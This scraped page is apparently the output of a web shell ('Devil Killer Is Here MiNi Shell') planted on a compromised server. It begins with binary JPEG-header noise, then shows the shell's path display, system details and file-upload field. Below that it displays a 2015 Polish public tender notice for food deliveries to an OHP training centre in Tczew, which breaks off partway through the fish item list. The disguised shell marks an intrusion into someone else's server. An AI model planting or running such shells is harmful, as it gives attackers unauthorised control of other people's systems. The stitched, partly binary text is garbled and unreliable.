JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150901/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150901/129247-N-2015.html

<p class="kh_header"><b>Gdańsk: Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie w 2016 r.</b><br>
<b>Numer ogłoszenia: 129247 - 2015; data zamieszczenia: 01.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pomorskawkohp.bip.gov.pl/    http://www.pomorska.ohp.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie w 2016 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> -Przedmiotem zamówienia jest sukcesywna bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie od 1 stycznia 2016 r. do dnia 31 grudnia 2016 roku do: Ośrodka Szkolenia i Wychowania w Tczewie, ul. Sobieskiego 10. 
-Przedmiot zamówienia podzielono na 15 zadań częściowych:
Zadanie nr 1 - owoce świeże 
Zadanie nr 2 - owoce przetworzone  
Zadanie nr 3 - warzywa świeże 
Zadanie nr 4 - warzywa przetworzone 
Zadanie nr 5 - mrożonki 
Zadanie nr 6 - jaja
Zadanie nr 7 - mięso i produkty mięsne 
Zadanie nr 8 - ryby i przetwory konserwowe 
Zadanie nr 9 - produkty przemiału ziarna i skrobi - pieczywo 
Zadanie nr 10 - produkty skrobi - mąka  
Zadanie nr 11 - różne produkty spożywcze 
Zadanie nr 12- oleje i tłuszcze roślinne 
Zadanie nr 13 - produkty mleczarskie  
Zadanie nr 14 - napoje 
Zadanie nr 15 - cukiernicze produkty 
-Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do Ośrodka Szkolenia i Wychowania w Tczewie, ul. Sobieskiego 10 (dokładne miejsce na terenie OSiW Tczew wskazane będzie przez Zamawiającego po podpisaniu umowy).
-Dostawca realizuje dostawy na własny koszt, transportem przystosowanym do tego celu i spełniającym niezbędne wymagania określone przepisami prawa obowiązującymi w tym zakresie. 
-Każdy z artykułów powinien być dostarczony w wymaganych opakowaniach. Każdorazowa dostawa będzie odbywać się na podstawie wcześniejszego zapotrzebowania określającego dokładną godzinę dostarczenia, datę  ilość, rodzaj asortymentu, złożonego pisemnie, faksem  lub telefonicznie. 
-Cykliczne dostawy  będą realizowane jak następuje:  
-Zamawiający powiadomi telefonicznie lub pisemnie lub faksem Wykonawcę, o każdej dostawie oraz wskaże zamawiane artykuły z podaniem ilości. Dostawy będą realizowane od poniedziałku do niedzieli w godzinach od  5.00 do   14.00, na podstawie zamówienia cząstkowego, złożonego pisemnie, faksem lub telefonicznie
-Artykuły muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
-Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa artykułów wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument.
-Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie artykułów do siedziby Zamawiającego na okres do następnej dostawy.
-Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie.
-Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia      zamówienia. Wykonawcy będzie przysługiwało jedynie wynagrodzenie za zrealizowane dostawy bez naliczania kar umownych w razie zmniejszenia ilości dostaw.
-W trakcie realizacji zamówienia Zamawiający zastrzega sobie możliwość zamiany proporcji ilościowych poszczególnego asortymentu w stosunku do podanego w formularzu ofertowym. 
-Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanych artykułów i      dostarczenia nowej partii artykułów do siedziby  Zamawiającego  w dniu złożenia reklamacji.
-Do składania zamówień Zamawiający upoważni wybranego pracownika.
-W przypadku niedostarczenia towaru w wyznaczonym terminie i czasie lub dostarczenia towaru niezgodnie ze złożonym zapotrzebowaniem, Zamawiający zastrzega sobie prawo do zakupu niedostarczonego towaru, a kosztami zakupu (fakturą Vat) obciąży Wykonawcę. Zamawiający powiadomi o tym fakcie Wykonawcę telefonicznie i na piśmie.
-Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie rozwiązań równoważnych o parametrach techniczno/eksploatacyjno/użytkowych nie gorszych niż te, podane pod pojęciem typu. 
-Wykonawca ma obowiązek wystawiać faktury oddzielne na każde zamówienie cząstkowe.  
-Zamawiający zastrzega sobie możliwość  zastosowania prawa opcji, tj. możliwość zmniejszenia ilości poszczególnych rodzajów artykułów żywnościowych w stosunku do podanych w formularzu cenowym. Maksymalny zakres przedmiotu zamówienia może zostać pomniejszony o nie więcej niż 90 % ogólnej wartości tzn. zostanie zrealizowany w co najmniej 10 % wartości zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-8, 15.30.00.00-1, 15.50.00.00-3, 15.89.80.00-3, 15.43.00.00-1, 03.21.00.00-6, 15.41.00.00-5, 15.13.10.00-5, 15.33.11.70-9, 03.22.00.00-9, 15.33.24.10-1, 15.22.00.00-6, 15.86.00.00-4, 15.87.00.00-7, 03.14.25.00-3, 15.30.00.00-1, 15.81.00.00-9, 15.00.00.00-8, 15.80.00.00-6, 15.13.11.10-9, 15.13.11.20-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający zaleca dołączyć dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik także pełnomocnictwo określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin dostawy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie:
-Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
-Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
-W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. Stawki ZUS. W przypadku zmiany obowiązującej stawki podatku VAT, stawki ZUS Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT lub ZUS. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT, stawki ZUS jeszcze nie dokonano.
-Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy.
-Zmiany powszechnie obowiązujących  przepisów  prawa  w  zakresie  mającym wpływ na realizację umowy.  
-W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pomorskawkohp.bip.gov.pl/          http://www.pomorska.ohp.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można uzyskać nieodpłatnie  w godz. od 8oo do 15 oo  w siedzibie  Zamawiającego,  pokój nr 610, VI piętro. ul. Uphagena 27, 80-237 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2015 godzina 08:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
 (sekretariat pokój 605) 6 piętro:.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arbuz	kg	25
Banany	kg	40
Brzoskwinie	kg	20
Cytryny	kg	10
Gruszki	kg	40
Jabłka	kg	300
Kiwi	kg	10
Mandarynki	kg	20
Nektaryny	kg	20
Pomarańcze	kg	30
Truskawki	kg	10
Winogrona	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas konserwowany min.560 g.	szt	20
Brzoskwinie kons. 820 g.	szt	20
Dżem  min. 220g	szt	200
Kompot wiśniowy min. 680 g.	szt	10
Orzechy włoskie	kg	1,5
Rodzynki suszone 100 g.	szt	10
Syrop owocowy min. 950 ml	szt	20
Syrop owocowy 4,96l	szt	30
Śliwki suszone 200 g.	szt	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuł	szt	35
Burak	kg	180
Burak młody - botwina	szt	10
Cebula	kg	200
Czosnek	szt	25
Fasola drobna 0,5 kg	szt.	30
Fasola jaś	kg	25
Fasola szparagowa	kg	10
Groch łuska 0,5kg	szt	30
Kalafior	szt	40
Kapusta 	kg	150
Kapusta czerwona	kg	15
Kapusta młoda 	szt	30
Kapusta pekińska	kg	20
Koper	szt	100
Marchew młoda	kg	30
Marchew myta	kg	250
Ogórek świeży	kg	180
Papryka świeża	kg	80
Pieczarka	kg	60
Pietruszka korzeń	kg	10
Pomidor	kg	150
Por 	szt	30
Por 	kg	50
Rzodkiewka pęczki	szt	120
Sałata	szt	100
Seler	kg	150
Szczypiorek	szt	30
Zielenina natka	szt	150
Ziemniaki 	kg	2500
Ziemniaki młode	kg	350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chrzan tarty min. 160g	szt
Fasola czerwona min. 400 g.	szt.
Groszek konserwowy min. 400g	szt
Kapusta kiszona  	kg
Koncentrat pomidorowy min. 0,9 l	szt
Kukurydza konserwowa min. 400g	szt
Ogórki kiszone 	kg
Ogórki konserwowe min. 870 g.	szt
Ogórki małosolne	kg
Papryka konserwowa min. 680 g.	szt
Pieczarka konserwowa min. 755 g.	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuły mroż. 450 g 	szt	20
Brukselka mroż 450 g 	szt	10
Kalafior mroż 450 g.	szt.	20
Marchew kostka mroż 450 g.	szt.	20
Pyzy z mięsem 	kg	20
Pyzy z owocami (knedle) 	kg	20
Zupa jarzynowa 	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja	szt	2700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Baleron wieprzowy	kg	20
Boczek świeży	kg	10
Boczek wędzony surowy	kg	80
Filet z piersi kurczaka	kg	80
Golonka wieprz b/k	kg	5
Karkówka wieprz b/k 	kg	80
Kaszanka	kg	40
Kiełbasa biała  surowa	kg	20
Kiełbasa krakowska parzona	kg	40
Kiełbasa szynkowa drobiowa	kg	80
Kiełbasa szynkowa wieprzowa	kg	75
Kiełbasa śląska lub równoważna	kg	80
Kiełbasa toruńska lub równoważna	kg	40
Korpusy drobiowe(grzbiety)	kg	200
Kości wieprzowe	kg	30
Kurczak	kg	4
Łopatka b/k	kg	365
Metka  typu wiejska lub równoważna	kg	45
Mielonka konserwowa	kg	40
Mielonka śniadaniowa lub równoważna	kg	40
Mięso gulaszowe	kg	20
Mortadela	kg	40
Ogonówka 	kg	40
Parówka w folii	kg	40
Pasztet zapiekany	kg	15
Pasztetowa  domowa lub równoważna	kg	45
Polędwica drobiowa	kg	60
Polędwica sopocka drobiowalub równoważna	kg	30
Przysmak śniadaniowy 130g	szt	45
Przysmak w konserwie lub równoważny	kg	25
Schab wiep b/k	kg	70
Serdelki	kg	40
Słonina	kg	6
Szynka konserwowa 	kg	29
Szynka mielona	kg	40
Szynka typu królewiecka mielona lub równowazna	kg	15
Szynka wiep b/k	kg	30
Szynka wieprzowa - wędlina	kg	20
Turystyczna lub równowazna  min.250g	szt	45
Tyrolska puszka  min.250g lub równoważna	szt	45
Udka z kurczaka	kg	225
Wątroba drobiowa z kurczaka	kg	50
Wątroba wieprzowa	kg	30
Żeberka wieprzowe 	kg	20
Żołądki drobiowe	kg	30
Żywiecka lub równoważna	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.90.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - ryby i przetwory konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Makrela wędzona	kg	25
Matijas	kg	20
Panga	kg	80
Paprykarz min.  170 g	szt	50
Szprot w pomidorach  min.150g	szt	50
Śledź w pomidorach 300g	szt	50.</p></li>
